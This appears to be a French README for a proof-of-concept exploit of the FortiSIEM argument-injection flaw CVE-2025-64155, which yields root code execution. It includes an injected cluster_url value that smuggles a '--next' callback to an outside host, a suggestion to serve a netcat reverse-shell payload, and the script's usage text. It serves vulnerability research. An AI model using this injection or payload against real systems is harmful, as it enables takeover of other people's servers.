
CVE-2025-64155 : Injection d'argument Fortinet FortiSIEM vers exécution de code à distance
Exploit de preuve de concept pour Fortinet FortiSIEM qui abuse d'une injection d'arguments pour écrire un fichier et obtenir une exécution de code en tant que root
Analyse approfondie ici : Horizon3.ai - CVE-2025-64155 : Trois ans à prendre le contrôle à distance de Fortinet FortiSIEM
L'exploitation de ce problème pour écraser des fichiers d'application entraînera probablement une instabilité du système. À utiliser avec prudence. Les vérifications peuvent être exécutées de manière bénigne en modifiant cluster_url pour être : <cluster_url>http://127.0.0.1:80 --next http://<INTERACTSH_URL></cluster_url>
serve.py avec le payload souhaité (ex. nc reverse shell)serve.pyCVE-2025-64155.py% python3 CVE-2025-64155.py -h
usage: CVE-2025-64155.py [-h] -t TARGET [-p PORT]
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
The IP address of the target
-p PORT, --port PORT The port of the Phoenix Monitor service
Ce logiciel a été créé uniquement à des fins de recherche académique et pour le développement de techniques défensives efficaces, et n'est pas destiné à être utilisé pour attaquer des systèmes sauf autorisation explicite. Les mainteneurs du projet ne sont pas responsables de l'utilisation abusive du logiciel. Utilisez-le de manière responsable.